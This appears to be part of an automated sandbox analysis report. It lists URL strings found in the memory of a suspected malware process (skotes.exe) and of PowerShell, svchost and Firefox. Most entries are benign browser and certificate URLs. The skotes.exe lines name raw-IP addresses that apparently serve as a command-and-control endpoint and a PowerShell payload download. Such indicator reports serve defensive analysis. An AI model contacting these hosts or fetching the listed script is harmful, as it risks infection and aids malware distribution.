Source: skotes.exe, 00000006.00000002.3278202583.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpu
Source: skotes.exe, 00000006.00000002.3278202583.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/dx
Source: skotes.exe, 00000006.00000002.3278202583.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/l
Source: skotes.exe, 00000006.00000002.3278202583.00000000009C9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3278202583.00000000009EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/5124158732/KQGBYWk.ps1
Source: skotes.exe, 00000006.00000002.3278202583.00000000009EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/5124158732/KQGBYWk.ps1XYZ0123456789
Source: skotes.exe, 00000006.00000002.3278202583.00000000009C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/5124158732/KQGBYWk.ps1swsock.dll
Source: firefox.exe, 00000010.00000003.3270733582.000001A8B8604000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
Source: firefox.exe, 00000010.00000003.3270733582.000001A8B8604000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
Source: firefox.exe, 00000010.00000003.3270733582.000001A8B8604000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
Source: firefox.exe, 00000010.00000003.3270733582.000001A8B8604000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
Source: firefox.exe, 00000010.00000003.3275418110.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3231894604.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3309155779.000001A8B2A88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/Di
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B61BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: firefox.exe, 00000010.00000002.3311223574.000001A8B2ABA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mi
Source: svchost.exe, 0000000C.00000002.3297975932.0000029748A00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: firefox.exe, 00000010.00000003.3275418110.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3231894604.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3309155779.000001A8B2A88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digi
Source: firefox.exe, 00000010.00000002.3309155779.000001A8B2A88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: firefox.exe, 00000010.00000003.3275418110.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3231894604.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3309155779.000001A8B2A88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/QX
Source: firefox.exe, 00000010.00000003.3275418110.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3231894604.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3309155779.000001A8B2A88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-
Source: firefox.exe, 00000010.00000003.3275418110.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3231894604.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3309155779.000001A8B2A88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: firefox.exe, 00000010.00000002.3316913295.000001A8B4977000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3240111814.000001A8BFFCD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3316913295.000001A8B498C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3235722215.000001A8C37BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 00000010.00000002.3340745234.000001A8B7CA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/
Source: firefox.exe, 00000010.00000002.3330787150.000001A8B6F81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3340745234.000001A8B7C70000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3235722215.000001A8C37DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000010.00000002.3316913295.000001A8B493B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3340745234.000001A8B7C70000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3235722215.000001A8C37BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3340745234.000001A8B7CE9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000010.00000003.3235722215.000001A8C37BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3343255794.000001A8B7E24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 00000010.00000002.3336679664.000001A8B7240000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListenerFailed
Source: firefox.exe, 00000010.00000002.3336679664.000001A8B7240000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListenerThe
Source: firefox.exe, 00000010.00000002.3307005394.000001A8B278A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 00000010.00000002.3307005394.000001A8B2781000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/dates-and-times
Source: firefox.exe, 00000010.00000002.3307005394.000001A8B278A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 00000010.00000002.3307005394.000001A8B2781000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/regular-expressions
Source: firefox.exe, 00000010.00000002.3307005394.000001A8B278A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 00000010.00000002.3302124352.000001A8A5F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/stringsp
Source: svchost.exe, 0000000C.00000003.2982483521.0000029748840000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.12.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000007.00000002.3030468982.0000000004EF7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://go.micros
Source: firefox.exe, 00000010.00000003.3262271793.000001A8B84F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-04/schema#
Source: firefox.exe, 00000010.00000003.3262271793.000001A8B84F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-06/schema#
Source: firefox.exe, 00000010.00000003.3262271793.000001A8B84F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-07/schema#-
Source: firefox.exe, 00000010.00000003.3166689570.000001A8C029B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3262271793.000001A8B84F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3212699709.000001A8C02BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3216367236.000001A8C02BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org
Source: firefox.exe, 00000010.00000003.3263352248.000001A8C37E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3153226064.000001A8B7DE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3122752444.000001A8B7DE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3155324261.000001A8B7DED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3235722215.000001A8C37DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/
Source: firefox.exe, 00000010.00000003.3153226064.000001A8B7DE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3122752444.000001A8B7DE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3155324261.000001A8B7DED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/9
Source: firefox.exe, 00000010.00000003.3225852250.000001A8B8034000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3136123245.000001A8C0072000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3338609624.000001A8B77AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3126451477.000001A8B7F1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3126451477.000001A8B7F21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3345552050.000001A8B7F32000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3168949956.000001A8B7F71000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3214998427.000001A8C0042000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3246944068.000001A8B91AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3123477613.000001A8B7FB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3144090733.000001A8B7F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3125375221.000001A8B7FEB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3217438778.000001A8B7F64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3168949956.000001A8B7F6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3208529617.000001A8B7F13000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3122026688.000001A8B7FB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3329068400.000001A8B6D37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3258702322.000001A8B8CED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3128048077.000001A8C0072000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3220095844.000001A8B66D0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3144473251.000001A8B7F71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: powershell.exe, 00000007.00000002.3051147504.0000000005AD3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: firefox.exe, 00000010.00000003.3275418110.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3231894604.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3309155779.000001A8B2A88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: firefox.exe, 00000010.00000003.3275418110.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3231894604.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3309155779.000001A8B2A88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: firefox.exe, 00000010.00000003.3275418110.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3231894604.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3309155779.000001A8B2A88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: powershell.exe, 00000007.00000002.3030468982.0000000004BC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: firefox.exe, 00000010.00000003.3065247433.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3165389836.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3327649126.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B61BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 00000010.00000002.3344282918.000001A8B7E85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3274109850.000001A8B7E85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0
Source: firefox.exe, 00000010.00000002.3344282918.000001A8B7E85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3274109850.000001A8B7E85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: powershell.exe, 00000007.00000002.3030468982.0000000004BC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000007.00000002.3030468982.0000000004A71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.3030468982.0000000004BC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: firefox.exe, 00000010.00000003.3065247433.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3165389836.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3327649126.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%squicksuggest.impressionCaps.stats
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B61BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: powershell.exe, 00000007.00000002.3030468982.0000000004BC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: firefox.exe, 00000010.00000003.3275418110.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3231894604.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3309155779.000001A8B2A88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: firefox.exe, 00000010.00000003.3065247433.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3165389836.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3327649126.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%sgecko.handlerService.defaultHandlersVersionextractScheme/fixupC
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B61BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: firefox.exe, 00000010.00000003.3275175701.000001A8B2AAB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.c
Source: firefox.exe, 00000010.00000003.3236983756.000001A8BFD4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-updatex
Source: firefox.exe, 00000010.00000003.3270733582.000001A8B8604000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: firefox.exe, 00000010.00000002.3327834513.000001A8B6A50000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B33A9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B33B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3106604957.000001A8B8ED3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3398000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8B6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B6159000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3328304158.000001A8B6B4A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3328304158.000001A8B6B21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000010.00000003.3258101012.000001A8B8D4B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3328304158.000001A8B6B21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul8
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulopenPreferences/internalPrefCategoryNam
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3325000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/sessionstore/Pri
Source: firefox.exe, 00000010.00000002.3344282918.000001A8B7E85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3274109850.000001A8B7E85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: firefox.exe, 00000010.00000002.3344282918.000001A8B7E85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3274109850.000001A8B7E85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 00000010.00000003.3049091889.000001A8B6D83000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3048859019.000001A8B6D6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3048647105.000001A8B6D50000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3048185549.000001A8B6D1C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3047492392.000001A8B6B00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3313124001.000001A8B3120000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000010.00000003.3048393713.000001A8B6D36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: firefox.exe, 00000010.00000003.3242315863.000001A8B9F2E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.c
Source: firefox.exe, 00000010.00000003.3257505596.000001A8B8D82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3270251672.000001A8B8D8A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 00000010.00000002.3340745234.000001A8B7CA4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 00000010.00000002.3316913295.000001A8B49BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3316913295.000001A8B4995000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 00000010.00000003.3233508837.000001A8C3D6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3262748007.000001A8C3DBD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/enhancer-for-youtube/
Source: firefox.exe, 00000010.00000003.3233508837.000001A8C3D6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3262748007.000001A8C3DBD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/facebook-container/
Source: firefox.exe, 00000010.00000003.3233508837.000001A8C3D6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3262748007.000001A8C3DBD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/reddit-enhancement-suite/
Source: firefox.exe, 00000010.00000003.3233508837.000001A8C3D6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3262748007.000001A8C3DBD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/to-google-translate/
Source: firefox.exe, 00000010.00000003.3233508837.000001A8C3D6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3262748007.000001A8C3DBD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/wikipedia-context-menu-search/
